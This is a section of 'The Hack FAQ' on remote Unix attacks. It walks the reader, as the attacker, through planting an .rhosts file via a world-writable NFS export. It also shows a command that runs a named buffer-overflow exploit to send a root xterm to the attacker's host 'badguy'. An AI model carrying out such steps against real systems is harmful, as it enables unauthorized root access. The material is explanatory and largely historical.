The Hack FAQ

30.0 Unix Remote Attacks


This section deals with hacking Unix systems remotely.


30.1 What are remote hacks?

A remote hack is when you attack a server you are not logged into. Usually this is done from another server, although in some cases you can do it from a regular PC (depending on the operating system).

Guessing a user account and password (unless it is a guest account) on a remote system is barely considered a remote hack, so we're not really cover that. We'll assume you don't know an account name and password on the remote system.

Remote hacks come in a couple of different flavors. Usually exploiting an existing service running on the victim server (which is misconfigured or allows too much access) is the goal. Exporting a NFS mount read/write to anyone might not be a bad thing, but if you can NFS mount directories containing .rhosts files, then it can be a very bad thing. Also, certain daemons running might be subject to buffer overflows remotely, allowing someone from a remote location run arbitrary commands on the victim server.

Here are a couple of examples:

  1. You are root on a host named badguy.
  2. You discover the host victim is exporting /home2/old read/writable to the world.
  3. You also discover by fingering various accounts that user fred's home directory is /home2/old/fred and he hasn't logged in for months.
  4. Quickly, you create a fred account on badguy.
  5. Now you mount /home2/old and create an .rhosts file to establish trust with badguy.
  6. After you become fred on badguy, you rlogin to the victim as fred.

Here's another attack involving a buffer overflow:

  1. This remote system is running named.
  2. You have written a named exploit that allows you to send arbitrary commands through the named daemon. It does a buffer overflow trick, you compile it and name it sploit.
  3. You type: sploit ns.example.com "/usr/X11R6/bin/xterm -display badguy.whatever:0"
  4. A window appears on your terminal that is running as root on ns.example.com.

Top | Next: Unix Logging | Previous: Unix Local Attacks | Table of Contents